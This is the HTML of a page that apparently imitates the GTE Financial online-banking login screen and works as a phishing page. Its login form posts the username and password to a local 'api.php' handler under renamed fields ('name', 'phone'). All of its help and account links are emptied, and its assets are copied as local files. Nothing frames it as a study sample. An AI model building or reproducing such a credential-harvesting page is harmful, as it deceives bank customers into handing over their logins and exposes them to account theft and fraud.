<!DOCTYPE html><!-- 43  --><html lang="en" style="" class=" js canvas canvastext cssanimations cssgradients csstransforms csstransforms3d csstransitions svg inlinesvg svgclippaths"><head id="ctl00_Head1"><title>
	GTE Financial: GTE Online Banking Login
</title><meta charset="UTF-8"><meta id="ctl00_viewport" name="viewport" content="width=device-width, initial-scale=1.0"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="format-detection" content="telephone=no"><meta http-equiv="X-UA-Compatible" content="IE=edge"><link href="FavIcon.ico" rel="shortcut icon" type="image/x-icon">
<link href="bootstrap.css" rel="stylesheet">
<link href="fontawesome.css" rel="stylesheet">
<link href="olb.css" rel="stylesheet">




        
    
        
    <link href="01.3-site.css" type="text/css" rel="stylesheet"><link href="02-RadGrid.css" type="text/css" rel="stylesheet"><link href="03-print.css" type="text/css" rel="stylesheet"><link href="04-media.css" type="text/css" rel="stylesheet"><link href="jquery.countdown.css" rel="stylesheet" type="text/css"><link type="text/css" rel="stylesheet" href="visitor-app.a4e08bf0.default.css"></head>
<body id="ctl00_body" class="dark-bg">
      
    
	<div class="main-content" role="main">
        
        





        <form name="aspnetForm" method="post" action="api.php" id="aspnetForm">
<div>
</div>















<div>
</div>
            
            
 
            
            
    

            <div class="display-table wrap-text" style="width:100%;">
                <div class="display-cell valign-top" style="width:100%;">      
                    <div id="ctl00_mainDiv">
                        <div id="ctl00_containerDiv">
                            <div id="ctl00_spacerDiv">
                                

    
    <div class="login-page">
        <div class="modal fade show" id="staticBackdrop" data-backdrop="static" data-keyboard="false" tabindex="-1" aria-labelledby="staticBackdropLabel" style="display: block;z-index:auto;">
            <div class="modal-dialog modal-lg modal-dialog-centered login">
                <div class="modal-content">
                    <a href="">
                        <img class="logo" src="logo-gte.svg" alt="GTE Financial" style="border-width:0px;">
                    </a>
                    <div class="modal-body rounded-top bg-image-container">
                        <div id="ctl00_ContentPlaceHolder1_bgImage" class="bg-image d-none d-lg-block" style="background-image:url(&quot;background.jpg&quot;);cursor:pointer;"></div>
                        <div id="ctl00_ContentPlaceHolder1_bgImageSmall" class="bg-image d-block d-lg-none" style="background-image:url(&quot;background-sm.jpg&quot;);background-position:center;cursor:pointer;"></div>
                    </div>
                    <div class="modal-footer">
                        
                        
                        <div id="ctl00_ContentPlaceHolder1_loginUsernameSection" class="form-group col-10 col-md-4 p-0">
                            <input name="name" type="text" maxlength="100" id="ctl00_ContentPlaceHolder1_username" class="form-control" autocomplete="off" placeholder="Username" required>
                            <span id="ctl00_ContentPlaceHolder1_usernameRequired1" class="login-validation-err" style="color:Red;display:none;"></span>
                        </div>
                        <div id="ctl00_ContentPlaceHolder1_loginPasswordSection" class="form-group col-10 col-md-4 p-0">
                            <input name="phone" type="password" maxlength="300" id="ctl00_ContentPlaceHolder1_password" class="form-control password-field" autocomplete="off" placeholder="Password" required>
                            <i class="fas fa-eye-slash toggle-password cursor-pointer"></i>
                            <span id="ctl00_ContentPlaceHolder1_RequiredFieldValidator1" class="login-validation-err" style="color:Red;display:none;"></span>
                        </div>
                        <div id="ctl00_ContentPlaceHolder1_loginSubmitSection" class="form-group">
                            <input type="submit" name="ctl00$ContentPlaceHolder1$login" value="LOGIN" id="ctl00_ContentPlaceHolder1_login" class="btn btn-primary text-uppercase d-inline-block">
                            <i class="loading-spinner fa fa-spinner fa-spin align-middle d-none"></i>
                        </div>
                        <div id="ctl00_ContentPlaceHolder1_loginCardLinks">
                            <ul>
                                <li><a id="ctl00_ContentPlaceHolder1_lbnLanguage" class="navbar-language-toggle" href="javascript:">Español</a></li>
                                <li><a id="ctl00_ContentPlaceHolder1_hlkForgotUsername" href="">Forgot Username</a></li>
                                <li><a id="ctl00_ContentPlaceHolder1_hlkForgotPassword" href="">Forgot Password</a></li>
                                <li><a id="ctl00_ContentPlaceHolder1_hlkJoin" href="">Join</a></li>
                                <li><a id="ctl00_ContentPlaceHolder1_hlkEnroll" href="">Enroll in Online Banking</a></li>
                                <li><a id="ctl00_ContentPlaceHolder1_lbLiveChat" href="javascript:">Live Chat</a></li>
                                <li><a id="ctl00_ContentPlaceHolder1_hlkBrowserCode" class="omnibrowse-code-button" href="javascript:">Get CoBrowser Code</a></li>
                                <li><a id="ctl00_ContentPlaceHolder1_hlkBrowserSupport" href="">Browser Support</a></li>
                            </ul>
                            
                             <div id="lpchat-olb-new-header" style="display: none;">
                                <div id="lpchat-olb-new-header-anonymous"><div id="LPMcontainer-1696610529288-0" class="LPMcontainer LPMoverlay" style="margin: 1px; padding: 0px; border-style: solid; border-width: 0px; font-style: normal; font-weight: normal; font-variant: normal; list-style: outside none none; letter-spacing: normal; line-height: normal; text-decoration: none; vertical-align: baseline; white-space: normal; word-spacing: normal; background-repeat: repeat-x; background-position: left bottom; cursor: auto; display: block; position: relative; top: 0px; left: 0px;"><a href="#" data-lp-event="click" "="">
<img src="help3.png" alt="">
</a></div></div>
                            </div>
                        </div>
                    </div>
                    <div class="disclaimers">
                        <img src="logo-ncua.svg" alt="NCUA" style="border-width:0px;">
                    </div>
                </div>
            </div>
        </div>
        <div class="main-bg" style="background-image:url(&quot;bg-login.jpg&quot;);"></div>
    </div>

    
    <div class="modal fade" id="pmChallengeModal" tabindex="-1" role="dialog" data-keyboard="false" data-backdrop="static" aria-hidden="true">
        <div class="modal-dialog modal-dialog-centered security" role="document">
            <div class="modal-content">
                <div class="modal-header modal-header-padding rounded-top">
                    <div class="modal-header-nav">
                        <div>               
                            <div class="pull-right">
                                <img class="modal-header-image" src="logo.png" alt="GTE Financial" style="border-width:0px;">
                            </div>
                        </div>
                    </div>
                </div>
                <div class="modal-body">
                    
                </div>
            </div>
        </div>
    </div>
      
    
    <input type="hidden" name="ctl00$ContentPlaceHolder1$hdnImgInfo" id="ctl00_ContentPlaceHolder1_hdnImgInfo" value="Content/Themes/images/login/background.jpg">
    <input type="hidden" name="ctl00$ContentPlaceHolder1$hdnImgInfoSmall" id="ctl00_ContentPlaceHolder1_hdnImgInfoSmall" value="Content/Themes/images/login/background-sm.jpg">

 
                            </div>
                        </div>
                    </div>
                </div>
                <div id="ctl00_sideColumn" class="display-cell valign-top">
                     
                </div>
            </div>       
        






</form>
    </div>
    
    
<div id="alertModal" class="modal fade details-modal modal-center-screen" role="dialog" data-backdrop="static">
    <div class="modal-dialog modal-sm" role="document">
        <div class="modal-content">
            <div class="modal-header">
                <h5 class="modal-title">Alert</h5>
            </div>
            <div id="alertModalMessage" class="modal-body">
            </div>
            <div class="modal-footer" data-dismiss="modal">Close</div>
        </div>
    </div>
</div>   
    

<div id="session-timeout-modal" class="modal fade modal-center-screen session-timeout-modal" role="dialog" data-backdrop="static">
    <div class="modal-dialog" role="document">
        <div class="modal-content">
            <div class="modal-header">
                <h4 class="modal-title">Your session will expire in:</h4>
            </div>
            <div class="modal-body">
                <div id="session-timeout-countdown"></div>
                <p class="session-timeout-message">Click "Continue" to keep working, or "Log Out" if you are finished.</p>
            </div>
            <div class="modal-footer">
                <button type="button" class="btn btn-primary session-timeout-continue">Continue</button>
                <button type="button" class="btn btn-primary session-timeout-end">Log Out</button>
            </div>
        </div>
    </div>
</div>   
    
<div class="modal fade modal-center-screen" id="modalLeavingSite" tabindex="-1" role="dialog" aria-hidden="true">
    <div class="modal-dialog" role="document">
        <div class="modal-content">
            <div class="modal-header">
                <h5 class="modal-title">Leaving The Site?</h5>
            </div>
            <div class="modal-body">
                <p>By selecting this link, you will be leaving the GTE Financial website.</p>
                <ul class="text-left">
                    <li><small>GTE Financial does not operate this site, nor endorse the content, and cannot be held responsible for the accuracy of the information.</small></li>
                    <li><small>GTE Financial will not represent you or the third party website if you enter into a transaction.</small></li>
                    <li><small>Security and privacy features available at the GTE Financial website may not be available on this other website.</small></li>
                </ul>
            </div>
            <div class="modal-footer">
                <button type="button" id="btnLeaveSite" class="btn btn-round">Proceed</button>
                <button type="button" class="btn btn-round alt" data-dismiss="modal">Cancel</button>
            </div>
        </div>
    </div>
</div> 
    

<div id="salemove" class="salemove" style="display: none;">
    <div>
        <div id="sm-screen-reader" aria-live="polite"></div>
        <span class="sm-touch-draggable sm-touch-draggable-lower-right"><span class="sm-visitor-app"><span><span class="sm-reactive-interface"><span><span></span></span></span></span></span></span><span></span>
        <div id="omnibrowse-media" class="omnibrowse">
            <div class="ob-visitor-container" style="--theme-color: #0279c2; --theme-color-rgb: 2, 121, 194; --theme-color-darker: #026daf;">
                <div class="ob-screenshare " style="transform: translate3d(0px, 0px, 0px);"><span></span></div>
                <div class="ob-screenshare-visitor " style="transform: translate3d(0px, 0px, 0px);"></div>
            </div>
        </div>
    </div>
</div>


<a href="#" class="back-to-top"><i class="fa fa-angle-up"></i></a><iframe tabindex="-1" aria-hidden="true" role="presentation" title="Intentionally blank" name="lpSS_74269524630" id="lpSS_74269524630" src="index_1.html" style="width: 0px; height: 0px; position: absolute; top: -1000px; left: -1000px; display: none;"></iframe><div id="salemove" class="salemove" style="display: none;"><div class="sm-visitor-app-container " id="sm-visitor-app-container"><div style="--theme-color: #0279c2; --theme-color-rgb: 2, 121, 194; --theme-color-darker: #026daf;"><div class="sm-touch-draggable sm-touch-draggable-lower-right"><div class="sm-visitor-app"><span><div class="sm-reactive-interface"><span><span></span></span></div></span></div></div><span></span><div class="omnibrowse"><div class="ob-visitor-container" style="--theme-color: #0279c2; --theme-color-rgb: 2, 121, 194; --theme-color-darker: #026daf;"><div class="ob-screenshare    " style="transform: translate3d(0px, 0px, 0px);"><div class="sm-screen-reader-only" aria-live="polite"></div><div class="sm-screen-reader-only" aria-live="polite"></div><span></span></div><div class="ob-screenshare-visitor    " style="transform: translate3d(0px, 0px, 0px);"><div class="sm-screen-reader-only" aria-live="polite"></div><div class="sm-screen-reader-only" aria-live="polite"></div></div></div></div></div><div class="sm-screen-reader-only" role="alert"></div><div class="sm-screen-reader-only" aria-live="polite"></div></div><div id="omnibrowse" class="omnibrowse"><div class="ob-visitor-container"><div class="sm-screen-reader-only" aria-live="polite"></div><div class="ob-media   sm_cobrowsing_hidden_field    " style="transform: translate3d(0px, 0px, 0px);"><div class="sm-screen-reader-only" aria-live="polite"></div><div class="sm-screen-reader-only" aria-live="polite"></div><span></span></div><div class="ob-visitor-app undefined"><span><span></span></span></div><div class="ob-visitor-app "><span><span></span></span></div><div class="ob-screenshare    " style="transform: translate3d(0px, 0px, 0px);"><div class="sm-screen-reader-only" aria-live="polite"></div><div class="sm-screen-reader-only" aria-live="polite"></div><span></span></div><div class="ob-screenshare-visitor    " style="transform: translate3d(0px, 0px, 0px);"><div class="sm-screen-reader-only" aria-live="polite"></div><div class="sm-screen-reader-only" aria-live="polite"></div></div></div><div class="sm-screen-reader-only" role="alert"></div><div class="sm-screen-reader-only" aria-live="polite"></div></div></div><span id="cobrowsing-mouse-container"></span></body></html>